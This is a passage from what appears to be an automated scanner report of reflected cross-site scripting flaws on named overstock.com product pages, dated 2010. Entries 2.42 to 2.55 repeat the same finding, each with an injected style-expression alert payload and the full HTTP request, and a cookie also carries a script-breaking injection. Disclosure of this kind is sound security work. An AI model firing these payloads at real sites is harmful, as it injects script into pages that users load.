GET /Clothing-Shoes/JoJo-Designs-Girls-2-piece-Blue-Brown-Floral-Zebra-Rumba-Set/4245360/product.html?87978"style%3d"x%3aexpression(alert(1))"f1df361dfda=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.42. http://www.overstock.com/Clothing-Shoes/Journee-Collection-Womens-Luxury-Shawl/3876012/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca310"style%3d"x%3aexpression(alert(1))"3bd84c4e9aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca310"style="x:expression(alert(1))"3bd84c4e9aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Journee-Collection-Womens-Luxury-Shawl/3876012/product.html?ca310"style%3d"x%3aexpression(alert(1))"3bd84c4e9aa=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.43. http://www.overstock.com/Clothing-Shoes/Journee-Collection-Womens-Oversize-Sunglasses/4101368/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e55d"style%3d"x%3aexpression(alert(1))"6104c3f7437 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e55d"style="x:expression(alert(1))"6104c3f7437 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Journee-Collection-Womens-Oversize-Sunglasses/4101368/product.html?5e55d"style%3d"x%3aexpression(alert(1))"6104c3f7437=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.44. http://www.overstock.com/Clothing-Shoes/Journee-Womens-Knee-high-Platform-Slouch-Boots/5158589/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21359"style%3d"x%3aexpression(alert(1))"b582e3e7a97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21359"style="x:expression(alert(1))"b582e3e7a97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Journee-Womens-Knee-high-Platform-Slouch-Boots/5158589/product.html?21359"style%3d"x%3aexpression(alert(1))"b582e3e7a97=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.45. http://www.overstock.com/Clothing-Shoes/Kenneth-Cole-New-York-Chain-of-Command-Large-Hobo/4844370/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f41e1"style%3d"x%3aexpression(alert(1))"97eb311cfad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f41e1"style="x:expression(alert(1))"97eb311cfad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Kenneth-Cole-New-York-Chain-of-Command-Large-Hobo/4844370/product.html?f41e1"style%3d"x%3aexpression(alert(1))"97eb311cfad=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.46. http://www.overstock.com/Clothing-Shoes/Kenneth-Cole-New-York-Mens-Down-Coat/4852352/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42221"style%3d"x%3aexpression(alert(1))"04a83355377 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42221"style="x:expression(alert(1))"04a83355377 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Kenneth-Cole-New-York-Mens-Down-Coat/4852352/product.html?42221"style%3d"x%3aexpression(alert(1))"04a83355377=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.47. http://www.overstock.com/Clothing-Shoes/Kenneth-Cole-New-York-Mens-Wool-Blend-Herringbone-Overcoat/4852362/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 152b5"style%3d"x%3aexpression(alert(1))"c6b4c300c57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 152b5"style="x:expression(alert(1))"c6b4c300c57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Kenneth-Cole-New-York-Mens-Wool-Blend-Herringbone-Overcoat/4852362/product.html?152b5"style%3d"x%3aexpression(alert(1))"c6b4c300c57=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.48. http://www.overstock.com/Clothing-Shoes/Kenneth-Cole-Unlisted-Street-Smart-Large-Hobo-Bag/5144756/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3508"style%3d"x%3aexpression(alert(1))"82e2010aa3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3508"style="x:expression(alert(1))"82e2010aa3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Kenneth-Cole-Unlisted-Street-Smart-Large-Hobo-Bag/5144756/product.html?d3508"style%3d"x%3aexpression(alert(1))"82e2010aa3f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.49. http://www.overstock.com/Clothing-Shoes/Liliana-by-Adi-Womens-Faux-Suede-High-heel-Boots/3699769/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5ae3"style%3d"x%3aexpression(alert(1))"4290b54e8c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5ae3"style="x:expression(alert(1))"4290b54e8c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Liliana-by-Adi-Womens-Faux-Suede-High-heel-Boots/3699769/product.html?e5ae3"style%3d"x%3aexpression(alert(1))"4290b54e8c5=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.50. http://www.overstock.com/Clothing-Shoes/London-Times-Womens-Cap-Sleeve-Seamed-Dress/5067276/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eb6e"style%3d"x%3aexpression(alert(1))"cfe589e8801 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2eb6e"style="x:expression(alert(1))"cfe589e8801 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/London-Times-Womens-Cap-Sleeve-Seamed-Dress/5067276/product.html?2eb6e"style%3d"x%3aexpression(alert(1))"cfe589e8801=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.51. http://www.overstock.com/Clothing-Shoes/MG-Black-Mens-Zip-Front-Jacket/5126198/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e395"style%3d"x%3aexpression(alert(1))"96e916c06e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e395"style="x:expression(alert(1))"96e916c06e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/MG-Black-Mens-Zip-Front-Jacket/5126198/product.html?2e395"style%3d"x%3aexpression(alert(1))"96e916c06e9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.52. http://www.overstock.com/Clothing-Shoes/MIA-Womens-Gelato-Wedge-Boots/3095577/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 352bf"style%3d"x%3aexpression(alert(1))"4de5b594fe9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 352bf"style="x:expression(alert(1))"4de5b594fe9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/MIA-Womens-Gelato-Wedge-Boots/3095577/product.html?352bf"style%3d"x%3aexpression(alert(1))"4de5b594fe9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.53. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-M6700-Charm-Womens-Sunglasses/5066840/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c5d3"style%3d"x%3aexpression(alert(1))"3cb36e7068e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c5d3"style="x:expression(alert(1))"3cb36e7068e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/MICHAEL-Michael-Kors-M6700-Charm-Womens-Sunglasses/5066840/product.html?3c5d3"style%3d"x%3aexpression(alert(1))"3cb36e7068e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.54. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Double-Breasted-Wool-Blend-Peacoat-with-Scarf/5109988/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8bd"style%3d"x%3aexpression(alert(1))"da8c638786b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f8bd"style="x:expression(alert(1))"da8c638786b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Double-Breasted-Wool-Blend-Peacoat-with-Scarf/5109988/product.html?5f8bd"style%3d"x%3aexpression(alert(1))"da8c638786b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.55. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Wool-Blend-Overcoat/5110032/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a1c8"style%3d"x%3aexpression(alert(1))"f71bfc3a0e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a1c8"style="x:expression(alert(1))"f71bfc3a0e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
